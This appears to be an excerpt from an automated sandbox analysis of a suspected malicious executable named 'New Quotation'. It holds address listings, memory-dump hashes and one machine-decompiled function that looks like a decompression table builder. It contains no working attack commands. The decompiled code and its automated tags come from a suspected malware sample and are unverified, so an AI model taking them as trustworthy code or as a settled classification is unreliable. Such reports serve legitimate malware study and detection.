                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00406cc9
                                                                                                                                                                                          0x00406cc9
                                                                                                                                                                                          0x00406ccb
                                                                                                                                                                                          0x00406ccd
                                                                                                                                                                                          0x00406cd0
                                                                                                                                                                                          0x00406cd7
                                                                                                                                                                                          0x00406cd7
                                                                                                                                                                                          0x00406cd9
                                                                                                                                                                                          0x00406cd2
                                                                                                                                                                                          0x00406cd2
                                                                                                                                                                                          0x00406cd4
                                                                                                                                                                                          0x00406cd4
                                                                                                                                                                                          0x00406cdb
                                                                                                                                                                                          0x00406cdd
                                                                                                                                                                                          0x00406ce0
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00406de4
                                                                                                                                                                                          0x00406de7
                                                                                                                                                                                          0x00406dea
                                                                                                                                                                                          0x00406df0
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00406fc7
                                                                                                                                                                                          0x00406fc7
                                                                                                                                                                                          0x00406fc7
                                                                                                                                                                                          0x00406fca
                                                                                                                                                                                          0x00406fcd
                                                                                                                                                                                          0x00406fcf
                                                                                                                                                                                          0x00406fd2
                                                                                                                                                                                          0x00406fd8
                                                                                                                                                                                          0x00406fdf
                                                                                                                                                                                          0x00406fe1
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00406eb5
                                                                                                                                                                                          0x00406eb5
                                                                                                                                                                                          0x00406edd
                                                                                                                                                                                          0x00406edd
                                                                                                                                                                                          0x00406edd
                                                                                                                                                                                          0x00406edf
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00406ebd
                                                                                                                                                                                          0x00406ebd
                                                                                                                                                                                          0x00406ec1
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00406ec7
                                                                                                                                                                                          0x00406ec7
                                                                                                                                                                                          0x00406eca
                                                                                                                                                                                          0x00406ecd
                                                                                                                                                                                          0x00406ed0
                                                                                                                                                                                          0x00406ed2
                                                                                                                                                                                          0x00406ed4
                                                                                                                                                                                          0x00406ed7
                                                                                                                                                                                          0x00406eda
                                                                                                                                                                                          0x00406eda
                                                                                                                                                                                          0x00406eda
                                                                                                                                                                                          0x00406ee1
                                                                                                                                                                                          0x00406ee1
                                                                                                                                                                                          0x00406ee9
                                                                                                                                                                                          0x00406eec
                                                                                                                                                                                          0x00406ef2
                                                                                                                                                                                          0x00406ef5
                                                                                                                                                                                          0x00406ef9
                                                                                                                                                                                          0x00406efd
                                                                                                                                                                                          0x00406f00
                                                                                                                                                                                          0x00406f03
                                                                                                                                                                                          0x00406f1b
                                                                                                                                                                                          0x00406f1b
                                                                                                                                                                                          0x00406f1e
                                                                                                                                                                                          0x00406f2c
                                                                                                                                                                                          0x00406f2f
                                                                                                                                                                                          0x00406f20
                                                                                                                                                                                          0x00406f20
                                                                                                                                                                                          0x00406f22
                                                                                                                                                                                          0x00406f29
                                                                                                                                                                                          0x00406f29
                                                                                                                                                                                          0x00406f58
                                                                                                                                                                                          0x00406f58
                                                                                                                                                                                          0x00406f58
                                                                                                                                                                                          0x00406f5b
                                                                                                                                                                                          0x00406f5d
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00406f38
                                                                                                                                                                                          0x00406f38
                                                                                                                                                                                          0x00406f3c
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00406f42
                                                                                                                                                                                          0x00406f42
                                                                                                                                                                                          0x00406f45
                                                                                                                                                                                          0x00406f48
                                                                                                                                                                                          0x00406f4b
                                                                                                                                                                                          0x00406f4d
                                                                                                                                                                                          0x00406f4f
                                                                                                                                                                                          0x00406f52
                                                                                                                                                                                          0x00406f55
                                                                                                                                                                                          0x00406f55
                                                                                                                                                                                          0x00406f55
                                                                                                                                                                                          0x00406f5f
                                                                                                                                                                                          0x00406f5f
                                                                                                                                                                                          0x00406f61
                                                                                                                                                                                          0x00406f63
                                                                                                                                                                                          0x00406f6e
                                                                                                                                                                                          0x00406f71
                                                                                                                                                                                          0x00406f74
                                                                                                                                                                                          0x00406f76
                                                                                                                                                                                          0x00406f78
                                                                                                                                                                                          0x00406f7a
                                                                                                                                                                                          0x00406f7d
                                                                                                                                                                                          0x00406f80
                                                                                                                                                                                          0x00406f85
                                                                                                                                                                                          0x00406f88
                                                                                                                                                                                          0x00406f8b
                                                                                                                                                                                          0x00406f8e
                                                                                                                                                                                          0x00406f95
                                                                                                                                                                                          0x00406f98
                                                                                                                                                                                          0x00406f9a
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00406fa0
                                                                                                                                                                                          0x00406fa0
                                                                                                                                                                                          0x00406fa4
                                                                                                                                                                                          0x00406fb5
                                                                                                                                                                                          0x00406fb5
                                                                                                                                                                                          0x00406fb5
                                                                                                                                                                                          0x00406fb7
                                                                                                                                                                                          0x00406fb7
                                                                                                                                                                                          0x00406fbb
                                                                                                                                                                                          0x00406fbb
                                                                                                                                                                                          0x00406fbb
                                                                                                                                                                                          0x00406fbd
                                                                                                                                                                                          0x00406fbe
                                                                                                                                                                                          0x00406fc1
                                                                                                                                                                                          0x00406fc1
                                                                                                                                                                                          0x00406fc1
                                                                                                                                                                                          0x00406fc4
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00406fc4
                                                                                                                                                                                          0x00406fa6
                                                                                                                                                                                          0x00406fa6
                                                                                                                                                                                          0x00406fa9
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00406faf
                                                                                                                                                                                          0x00406faf
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00406faf
                                                                                                                                                                                          0x00406f05
                                                                                                                                                                                          0x00406f05
                                                                                                                                                                                          0x00406f07
                                                                                                                                                                                          0x00406f09
                                                                                                                                                                                          0x00406f0c
                                                                                                                                                                                          0x00406f0f
                                                                                                                                                                                          0x00406f13
                                                                                                                                                                                          0x00406f13
                                                                                                                                                                                          0x00406fe7
                                                                                                                                                                                          0x00406fe7
                                                                                                                                                                                          0x00406fea
                                                                                                                                                                                          0x00406ff1
                                                                                                                                                                                          0x00406ff5
                                                                                                                                                                                          0x00406ff7
                                                                                                                                                                                          0x00406ffa
                                                                                                                                                                                          0x00406ffd
                                                                                                                                                                                          0x00407002
                                                                                                                                                                                          0x00407005
                                                                                                                                                                                          0x00407007
                                                                                                                                                                                          0x00407008
                                                                                                                                                                                          0x0040700b
                                                                                                                                                                                          0x00407016
                                                                                                                                                                                          0x00407019
                                                                                                                                                                                          0x00407030
                                                                                                                                                                                          0x00407035
                                                                                                                                                                                          0x0040703c
                                                                                                                                                                                          0x00407041
                                                                                                                                                                                          0x00407045
                                                                                                                                                                                          0x00407047
                                                                                                                                                                                          0x00407047
                                                                                                                                                                                          0x00407047
                                                                                                                                                                                          0x0040704a
                                                                                                                                                                                          0x0040704c
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00407052
                                                                                                                                                                                          0x00407052
                                                                                                                                                                                          0x00407056
                                                                                                                                                                                          0x00407061
                                                                                                                                                                                          0x00407074
                                                                                                                                                                                          0x00407079
                                                                                                                                                                                          0x0040707e
                                                                                                                                                                                          0x00407080
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00407086
                                                                                                                                                                                          0x00407086
                                                                                                                                                                                          0x00407089
                                                                                                                                                                                          0x0040708b
                                                                                                                                                                                          0x00407099
                                                                                                                                                                                          0x00407099
                                                                                                                                                                                          0x0040709c
                                                                                                                                                                                          0x0040709c
                                                                                                                                                                                          0x0040709f
                                                                                                                                                                                          0x004070a2
                                                                                                                                                                                          0x004070a5
                                                                                                                                                                                          0x004070a8
                                                                                                                                                                                          0x004070ab
                                                                                                                                                                                          0x004070ae
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x004070ae
                                                                                                                                                                                          0x0040708d
                                                                                                                                                                                          0x0040708d
                                                                                                                                                                                          0x00407093
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00407093
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00407432
                                                                                                                                                                                          0x00407432
                                                                                                                                                                                          0x00407438
                                                                                                                                                                                          0x0040743e
                                                                                                                                                                                          0x00407443
                                                                                                                                                                                          0x00407449
                                                                                                                                                                                          0x0040744f
                                                                                                                                                                                          0x00407451
                                                                                                                                                                                          0x00407454
                                                                                                                                                                                          0x0040745d
                                                                                                                                                                                          0x00407463
                                                                                                                                                                                          0x00407463
                                                                                                                                                                                          0x00407456
                                                                                                                                                                                          0x00407458
                                                                                                                                                                                          0x0040745a
                                                                                                                                                                                          0x0040745a
                                                                                                                                                                                          0x00407465
                                                                                                                                                                                          0x00407467
                                                                                                                                                                                          0x0040746a
                                                                                                                                                                                          0x004074a5
                                                                                                                                                                                          0x004074a5
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0040746c
                                                                                                                                                                                          0x0040746c
                                                                                                                                                                                          0x0040746c
                                                                                                                                                                                          0x00407472
                                                                                                                                                                                          0x00407475
                                                                                                                                                                                          0x00407477
                                                                                                                                                                                          0x004074ac
                                                                                                                                                                                          0x004074ae
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x004074ae
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00407477
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00406ab6
                                                                                                                                                                                          0x00407484
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00407484
                                                                                                                                                                                          0x00406e98
                                                                                                                                                                                          0x00406e9a
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00406e9c
                                                                                                                                                                                          0x00406e9c
                                                                                                                                                                                          0x00406e9f
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00406e9f
                                                                                                                                                                                          0x00406de4
                                                                                                                                                                                          0x00406da5
                                                                                                                                                                                          0x00407489
                                                                                                                                                                                          0x0040748c
                                                                                                                                                                                          0x0040748e
                                                                                                                                                                                          0x00407497
                                                                                                                                                                                          0x0040749d
                                                                                                                                                                                          0x00000000

                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.49391332260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.49391263589.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391435428.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391508741.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391862881.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391963803.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49392051591.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49392131322.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49392170728.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: fbe53aaae7eeab696340878b5eee03eb0fd33fb80e94407ce6853ed186f7d00c
                                                                                                                                                                                          • Instruction ID: 3db1d01f4341fbbb805040525b4c18df43ce82c239752998d09602440244d977
                                                                                                                                                                                          • Opcode Fuzzy Hash: fbe53aaae7eeab696340878b5eee03eb0fd33fb80e94407ce6853ed186f7d00c
                                                                                                                                                                                          • Instruction Fuzzy Hash: FEE18A71A0070ADFCB24CF59D880BAABBF5FB44305F15852EE496A72D1D338AA91CF45
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0040755C Relevance: .3, Instructions: 300COMMONCrypto
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                          			E0040755C(signed char _a4, char _a5, short _a6, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int* _a24, signed int _a28, intOrPtr _a32, signed int* _a36) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr* _v32;
				signed int* _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				void _v116;
				signed int _v176;
				signed int _v180;
				signed int _v240;
				signed int _t166;
				signed int _t168;
				intOrPtr _t175;
				signed int _t181;
				void* _t182;
				intOrPtr _t183;
				signed int* _t184;
				signed int _t186;
				signed int _t187;
				signed int* _t189;
				signed int _t190;
				intOrPtr* _t191;
				intOrPtr _t192;
				signed int _t193;
				signed int _t195;
				signed int _t200;
				signed int _t205;
				void* _t207;
				short _t208;
				signed char _t222;
				signed int _t224;
				signed int _t225;
				signed int* _t232;
				signed int _t233;
				signed int _t234;
				void* _t235;
				signed int _t236;
				signed int _t244;
				signed int _t246;
				signed int _t251;
				signed int _t254;
				signed int _t256;
				signed int _t259;
				signed int _t262;
				void* _t263;
				void* _t264;
				signed int _t267;
				intOrPtr _t269;
				intOrPtr _t271;
				signed int _t274;
				intOrPtr* _t275;
				unsigned int _t276;
				void* _t277;
				signed int _t278;
				intOrPtr* _t279;
				signed int _t281;
				intOrPtr _t282;
				intOrPtr _t283;
				signed int* _t284;
				signed int _t286;
				signed int _t287;
				signed int _t288;
				signed int _t296;
				signed int* _t297;
				intOrPtr _t298;
				void* _t299;

				_t278 = _a8;
				_t187 = 0x10;
				memset( &_v116, 0, _t187 << 2);
				_t189 = _a4;
				_t233 = _t278;
				do {
					_t166 =  *_t189;
					_t189 =  &(_t189[1]);
					 *((intOrPtr*)(_t299 + _t166 * 4 - 0x70)) =  *((intOrPtr*)(_t299 + _t166 * 4 - 0x70)) + 1;
					_t233 = _t233 - 1;
				} while (_t233 != 0);
				if(_v116 != _t278) {
					_t279 = _a28;
					_t267 =  *_t279;
					_t190 = 1;
					_a28 = _t267;
					_t234 = 0xf;
					while(1) {
						_t168 = 0;
						if( *((intOrPtr*)(_t299 + _t190 * 4 - 0x70)) != 0) {
							break;
						}
						_t190 = _t190 + 1;
						if(_t190 <= _t234) {
							continue;
						}
						break;
					}
					_v8 = _t190;
					if(_t267 < _t190) {
						_a28 = _t190;
					}
					while( *((intOrPtr*)(_t299 + _t234 * 4 - 0x70)) == _t168) {
						_t234 = _t234 - 1;
						if(_t234 != 0) {
							continue;
						}
						break;
					}
					_v28 = _t234;
					if(_a28 > _t234) {
						_a28 = _t234;
					}
					 *_t279 = _a28;
					_t181 = 1 << _t190;
					while(_t190 < _t234) {
						_t182 = _t181 -  *((intOrPtr*)(_t299 + _t190 * 4 - 0x70));
						if(_t182 < 0) {
							L64:
							return _t168 | 0xffffffff;
						}
						_t190 = _t190 + 1;
						_t181 = _t182 + _t182;
					}
					_t281 = _t234 << 2;
					_t191 = _t299 + _t281 - 0x70;
					_t269 =  *_t191;
					_t183 = _t181 - _t269;
					_v52 = _t183;
					if(_t183 < 0) {
						goto L64;
					}
					_v176 = _t168;
					 *_t191 = _t269 + _t183;
					_t192 = 0;
					_t235 = _t234 - 1;
					if(_t235 == 0) {
						L21:
						_t184 = _a4;
						_t271 = 0;
						do {
							_t193 =  *_t184;
							_t184 =  &(_t184[1]);
							if(_t193 != _t168) {
								_t232 = _t299 + _t193 * 4 - 0xb0;
								_t236 =  *_t232;
								 *((intOrPtr*)(0x432190 + _t236 * 4)) = _t271;
								 *_t232 = _t236 + 1;
							}
							_t271 = _t271 + 1;
						} while (_t271 < _a8);
						_v16 = _v16 | 0xffffffff;
						_v40 = _v40 & 0x00000000;
						_a8 =  *((intOrPtr*)(_t299 + _t281 - 0xb0));
						_t195 = _v8;
						_t186 =  ~_a28;
						_v12 = _t168;
						_v180 = _t168;
						_v36 = 0x432190;
						_v240 = _t168;
						if(_t195 > _v28) {
							L62:
							_t168 = 0;
							if(_v52 == 0 || _v28 == 1) {
								return _t168;
							} else {
								goto L64;
							}
						}
						_v44 = _t195 - 1;
						_v32 = _t299 + _t195 * 4 - 0x70;
						do {
							_t282 =  *_v32;
							if(_t282 == 0) {
								goto L61;
							}
							while(1) {
								_t283 = _t282 - 1;
								_t200 = _a28 + _t186;
								_v48 = _t283;
								_v24 = _t200;
								if(_v8 <= _t200) {
									goto L45;
								}
								L31:
								_v20 = _t283 + 1;
								do {
									_v16 = _v16 + 1;
									_t296 = _v28 - _v24;
									if(_t296 > _a28) {
										_t296 = _a28;
									}
									_t222 = _v8 - _v24;
									_t254 = 1 << _t222;
									if(1 <= _v20) {
										L40:
										_t256 =  *_a36;
										_t168 = 1 << _t222;
										_v40 = 1;
										_t274 = _t256 + 1;
										if(_t274 > 0x5a0) {
											goto L64;
										}
									} else {
										_t275 = _v32;
										_t263 = _t254 + (_t168 | 0xffffffff) - _v48;
										if(_t222 >= _t296) {
											goto L40;
										}
										while(1) {
											_t222 = _t222 + 1;
											if(_t222 >= _t296) {
												goto L40;
											}
											_t275 = _t275 + 4;
											_t264 = _t263 + _t263;
											_t175 =  *_t275;
											if(_t264 <= _t175) {
												goto L40;
											}
											_t263 = _t264 - _t175;
										}
										goto L40;
									}
									_t168 = _a32 + _t256 * 4;
									_t297 = _t299 + _v16 * 4 - 0xec;
									 *_a36 = _t274;
									_t259 = _v16;
									 *_t297 = _t168;
									if(_t259 == 0) {
										 *_a24 = _t168;
									} else {
										_t276 = _v12;
										_t298 =  *((intOrPtr*)(_t297 - 4));
										 *(_t299 + _t259 * 4 - 0xb0) = _t276;
										_a5 = _a28;
										_a4 = _t222;
										_t262 = _t276 >> _t186;
										_a6 = (_t168 - _t298 >> 2) - _t262;
										 *(_t298 + _t262 * 4) = _a4;
									}
									_t224 = _v24;
									_t186 = _t224;
									_t225 = _t224 + _a28;
									_v24 = _t225;
								} while (_v8 > _t225);
								L45:
								_t284 = _v36;
								_a5 = _v8 - _t186;
								if(_t284 < 0x432190 + _a8 * 4) {
									_t205 =  *_t284;
									if(_t205 >= _a12) {
										_t207 = _t205 - _a12 + _t205 - _a12;
										_v36 =  &(_v36[1]);
										_a4 =  *((intOrPtr*)(_t207 + _a20)) + 0x50;
										_t208 =  *((intOrPtr*)(_t207 + _a16));
									} else {
										_a4 = (_t205 & 0xffffff00 | _t205 - 0x00000100 > 0x00000000) - 0x00000001 & 0x00000060;
										_t208 =  *_t284;
										_v36 =  &(_t284[1]);
									}
									_a6 = _t208;
								} else {
									_a4 = 0xc0;
								}
								_t286 = 1 << _v8 - _t186;
								_t244 = _v12 >> _t186;
								while(_t244 < _v40) {
									 *(_t168 + _t244 * 4) = _a4;
									_t244 = _t244 + _t286;
								}
								_t287 = _v12;
								_t246 = 1 << _v44;
								while((_t287 & _t246) != 0) {
									_t287 = _t287 ^ _t246;
									_t246 = _t246 >> 1;
								}
								_t288 = _t287 ^ _t246;
								_v20 = 1;
								_v12 = _t288;
								_t251 = _v16;
								if(((1 << _t186) - 0x00000001 & _t288) ==  *((intOrPtr*)(_t299 + _t251 * 4 - 0xb0))) {
									L60:
									if(_v48 != 0) {
										_t282 = _v48;
										_t283 = _t282 - 1;
										_t200 = _a28 + _t186;
										_v48 = _t283;
										_v24 = _t200;
										if(_v8 <= _t200) {
											goto L45;
										}
										goto L31;
									}
									break;
								} else {
									goto L58;
								}
								do {
									L58:
									_t186 = _t186 - _a28;
									_t251 = _t251 - 1;
								} while (((1 << _t186) - 0x00000001 & _v12) !=  *((intOrPtr*)(_t299 + _t251 * 4 - 0xb0)));
								_v16 = _t251;
								goto L60;
							}
							L61:
							_v8 = _v8 + 1;
							_v32 = _v32 + 4;
							_v44 = _v44 + 1;
						} while (_v8 <= _v28);
						goto L62;
					}
					_t277 = 0;
					do {
						_t192 = _t192 +  *((intOrPtr*)(_t299 + _t277 - 0x6c));
						_t277 = _t277 + 4;
						_t235 = _t235 - 1;
						 *((intOrPtr*)(_t299 + _t277 - 0xac)) = _t192;
					} while (_t235 != 0);
					goto L21;
				}
				 *_a24 =  *_a24 & 0x00000000;
				 *_a28 =  *_a28 & 0x00000000;
				return 0;
			}











































































                                                                                                                                                                                          0x00407567
                                                                                                                                                                                          0x0040756f
                                                                                                                                                                                          0x00407573
                                                                                                                                                                                          0x00407575
                                                                                                                                                                                          0x00407578
                                                                                                                                                                                          0x0040757a
                                                                                                                                                                                          0x0040757a
                                                                                                                                                                                          0x0040757c
                                                                                                                                                                                          0x00407583
                                                                                                                                                                                          0x00407585
                                                                                                                                                                                          0x00407585
                                                                                                                                                                                          0x0040758b
                                                                                                                                                                                          0x004075a0
                                                                                                                                                                                          0x004075a8
                                                                                                                                                                                          0x004075aa
                                                                                                                                                                                          0x004075ac
                                                                                                                                                                                          0x004075af
                                                                                                                                                                                          0x004075b0
                                                                                                                                                                                          0x004075b0
                                                                                                                                                                                          0x004075b6
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x004075b8
                                                                                                                                                                                          0x004075bb
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x004075bb
                                                                                                                                                                                          0x004075bf
                                                                                                                                                                                          0x004075c2
                                                                                                                                                                                          0x004075c4
                                                                                                                                                                                          0x004075c4
                                                                                                                                                                                          0x004075c7
                                                                                                                                                                                          0x004075cd
                                                                                                                                                                                          0x004075ce
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x004075ce
                                                                                                                                                                                          0x004075d3
                                                                                                                                                                                          0x004075d6
                                                                                                                                                                                          0x004075d8
                                                                                                                                                                                          0x004075d8
                                                                                                                                                                                          0x004075de
                                                                                                                                                                                          0x004075e0
                                                                                                                                                                                          0x004075f1
                                                                                                                                                                                          0x004075e4
                                                                                                                                                                                          0x004075e8
                                                                                                                                                                                          0x0040788d
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0040788d
                                                                                                                                                                                          0x004075ee
                                                                                                                                                                                          0x004075ef
                                                                                                                                                                                          0x004075ef
                                                                                                                                                                                          0x004075f7
                                                                                                                                                                                          0x004075fa
                                                                                                                                                                                          0x004075fe
                                                                                                                                                                                          0x00407600
                                                                                                                                                                                          0x00407602
                                                                                                                                                                                          0x00407605
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0040760d
                                                                                                                                                                                          0x00407613
                                                                                                                                                                                          0x00407615
                                                                                                                                                                                          0x00407617
                                                                                                                                                                                          0x00407618
                                                                                                                                                                                          0x0040762d
                                                                                                                                                                                          0x0040762d
                                                                                                                                                                                          0x00407630
                                                                                                                                                                                          0x00407632
                                                                                                                                                                                          0x00407632
                                                                                                                                                                                          0x00407634
                                                                                                                                                                                          0x00407639
                                                                                                                                                                                          0x0040763b
                                                                                                                                                                                          0x00407642
                                                                                                                                                                                          0x00407644
                                                                                                                                                                                          0x0040764c
                                                                                                                                                                                          0x0040764c
                                                                                                                                                                                          0x0040764e
                                                                                                                                                                                          0x0040764f
                                                                                                                                                                                          0x0040765e
                                                                                                                                                                                          0x00407662
                                                                                                                                                                                          0x00407666
                                                                                                                                                                                          0x00407669
                                                                                                                                                                                          0x0040766c
                                                                                                                                                                                          0x00407671
                                                                                                                                                                                          0x00407674
                                                                                                                                                                                          0x0040767a
                                                                                                                                                                                          0x00407681
                                                                                                                                                                                          0x00407687
                                                                                                                                                                                          0x00407880
                                                                                                                                                                                          0x00407880
                                                                                                                                                                                          0x00407885
                                                                                                                                                                                          0x00407894
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00407885
                                                                                                                                                                                          0x00407694
                                                                                                                                                                                          0x00407697
                                                                                                                                                                                          0x0040769a
                                                                                                                                                                                          0x0040769d
                                                                                                                                                                                          0x004076a1
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x004076ac
                                                                                                                                                                                          0x004076af
                                                                                                                                                                                          0x004076b0
                                                                                                                                                                                          0x004076b2
                                                                                                                                                                                          0x004076b8
                                                                                                                                                                                          0x004076bb
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x004076c1
                                                                                                                                                                                          0x004076c2
                                                                                                                                                                                          0x004076c5
                                                                                                                                                                                          0x004076c8
                                                                                                                                                                                          0x004076cb
                                                                                                                                                                                          0x004076d1
                                                                                                                                                                                          0x004076d3
                                                                                                                                                                                          0x004076d3
                                                                                                                                                                                          0x004076db
                                                                                                                                                                                          0x004076df
                                                                                                                                                                                          0x004076e4
                                                                                                                                                                                          0x00407709
                                                                                                                                                                                          0x0040770f
                                                                                                                                                                                          0x00407711
                                                                                                                                                                                          0x00407713
                                                                                                                                                                                          0x00407716
                                                                                                                                                                                          0x0040771f
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x004076e6
                                                                                                                                                                                          0x004076e6
                                                                                                                                                                                          0x004076ef
                                                                                                                                                                                          0x004076f3
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00407704
                                                                                                                                                                                          0x00407704
                                                                                                                                                                                          0x00407707
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x004076f7
                                                                                                                                                                                          0x004076fa
                                                                                                                                                                                          0x004076fc
                                                                                                                                                                                          0x00407700
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00407702
                                                                                                                                                                                          0x00407702
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00407704
                                                                                                                                                                                          0x00407728
                                                                                                                                                                                          0x0040772e
                                                                                                                                                                                          0x00407738
                                                                                                                                                                                          0x0040773a
                                                                                                                                                                                          0x0040773f
                                                                                                                                                                                          0x00407741
                                                                                                                                                                                          0x00407777
                                                                                                                                                                                          0x00407743
                                                                                                                                                                                          0x00407743
                                                                                                                                                                                          0x00407746
                                                                                                                                                                                          0x00407749
                                                                                                                                                                                          0x00407753
                                                                                                                                                                                          0x00407756
                                                                                                                                                                                          0x0040775d
                                                                                                                                                                                          0x00407768
                                                                                                                                                                                          0x0040776f
                                                                                                                                                                                          0x0040776f
                                                                                                                                                                                          0x00407779
                                                                                                                                                                                          0x0040777c
                                                                                                                                                                                          0x0040777e
                                                                                                                                                                                          0x00407784
                                                                                                                                                                                          0x00407784
                                                                                                                                                                                          0x0040778d
                                                                                                                                                                                          0x00407790
                                                                                                                                                                                          0x00407795
                                                                                                                                                                                          0x004077a4
                                                                                                                                                                                          0x004077ac
                                                                                                                                                                                          0x004077b1
                                                                                                                                                                                          0x004077d5
                                                                                                                                                                                          0x004077dd
                                                                                                                                                                                          0x004077e1
                                                                                                                                                                                          0x004077e7
                                                                                                                                                                                          0x004077b3
                                                                                                                                                                                          0x004077c1
                                                                                                                                                                                          0x004077c4
                                                                                                                                                                                          0x004077ca
                                                                                                                                                                                          0x004077ca
                                                                                                                                                                                          0x004077eb
                                                                                                                                                                                          0x004077a6
                                                                                                                                                                                          0x004077a6
                                                                                                                                                                                          0x004077a6
                                                                                                                                                                                          0x004077fc
                                                                                                                                                                                          0x00407800
                                                                                                                                                                                          0x0040780c
                                                                                                                                                                                          0x00407807
                                                                                                                                                                                          0x0040780a
                                                                                                                                                                                          0x0040780a
                                                                                                                                                                                          0x00407814
                                                                                                                                                                                          0x00407819
                                                                                                                                                                                          0x00407821
                                                                                                                                                                                          0x0040781d
                                                                                                                                                                                          0x0040781f
                                                                                                                                                                                          0x0040781f
                                                                                                                                                                                          0x00407827
                                                                                                                                                                                          0x00407829
                                                                                                                                                                                          0x00407830
                                                                                                                                                                                          0x0040783a
                                                                                                                                                                                          0x00407844
                                                                                                                                                                                          0x00407860
                                                                                                                                                                                          0x00407864
                                                                                                                                                                                          0x004076a9
                                                                                                                                                                                          0x004076af
                                                                                                                                                                                          0x004076b0
                                                                                                                                                                                          0x004076b2
                                                                                                                                                                                          0x004076b8
                                                                                                                                                                                          0x004076bb
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x004076bb
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00407846
                                                                                                                                                                                          0x00407846
                                                                                                                                                                                          0x00407846
